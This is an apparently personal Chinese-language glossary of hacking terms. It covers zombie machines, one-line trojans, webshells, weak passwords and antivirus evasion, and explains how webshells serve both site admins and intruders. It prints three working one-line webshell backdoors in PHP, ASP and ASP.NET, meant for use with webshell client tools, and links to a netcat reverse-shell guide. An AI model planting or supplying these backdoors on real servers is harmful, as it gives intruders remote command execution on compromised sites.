这里写自定义目录标题

  • ​​肉鸡​​
  • ​​一句话木马​​
  • ​​Shell&Webshell​​
  • ​​弱口令​​
  • ​​免杀​​

肉鸡

肉鸡也称傀儡机,是指可以被黑客远程控制的机器。
比如用"灰鸽子"等诱导客户点击或者电脑被黑客攻破或用户电脑有漏洞被种植了木马,黑客可以随意操纵它并利用它做任何事情。
​​​百度百科资料​

一句话木马

一句话木马主要用来配合菜刀\冰蝎\蚁剑食用.

PHP: <?php @eval($_ POST['chabug']);?>
ASP: <%eval request(" chabug")%>
ASP.NET:<%@ Page Language= "Jscript" %> <%eval(Request.Item[" chabug"], "unsafe" );%>
Customize:自定义类型,功能代码在服务端保存,理论上支持所有动态脚本只要正确与
菜刀进行交互即可。

Shell&Webshell

挂一个大牛的​​Github​​​链接
补充NC反弹shell的一些链接:
​​[NC——反弹shell](https://www.jianshu.com/p/5b73a607e2ea)
使用NC命令反弹Shell​​ webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起,然后就可以使用浏览器来访问该后门文件了,从而得到一个命令执行环境,以达到控制网站服务器的目的。

顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。

一方面,webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

另一方面,被入侵者利用,从而达到控制网站服务器的目的。这些网页脚本常称为Web脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。

但是这里所说的木马都是些体积“庞大”的木马,也就是黑客中常称呼的" 大马 "。

弱口令

很容易被人破解就对了,没啥好记录的

免杀

通过各种方式绕过杀毒软件拦截的过程